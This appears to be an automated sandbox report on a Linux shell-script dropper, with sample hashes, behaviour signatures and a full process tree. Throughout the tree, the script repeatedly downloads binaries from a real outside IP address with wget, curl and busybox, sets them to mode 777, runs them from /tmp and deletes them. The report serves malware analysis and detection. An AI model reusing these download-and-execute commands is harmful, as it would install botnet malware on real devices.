Analysis
-
max time kernel
69s -
max time network
74s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
14-11-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
-
Size
10KB
-
MD5
917b3d2f50ea971b48d53c43acb35304
-
SHA1
bfe50bdd2f5d3467fef4e1a330a33fa6467e3b31
-
SHA256
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918
-
SHA512
0580e33716000342d8c2cb7288ca5d23607157542b578cd1f809877f776e9cade3cf808e804987ae0904bf5e8cb440e05090f15d6a7bce6e6af8e5b1b54b1cd4
-
SSDEEP
192:ES2PBbUb8bkbfbDbjfLN2uYRPn/6GpCe6MZRrNe6MZRH7gPn/6GibUb8bkbfbDb6:ES2P2fLN2uYfCe6MZRrNe6MZRH7CfLN8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh1⤵PID:666
-
/bin/rm/bin/rm bins.sh2⤵PID:674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:676
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:693
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:700
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:701
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:705
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:708
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:709
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:713
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:717
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:718
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:729
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:734
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:745
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:752
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:753
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:766
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:773
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:775
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:782
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:785
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:786
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:793
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:810
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:831
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:836
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:837
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:839
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:844
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:845
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:847
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:853
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:859
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:865
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:871
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:876
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:877
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:879
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:885
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:891
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:897
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:903
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:911
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:917
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:923
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:929
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:937
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:943
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:949
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:952
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97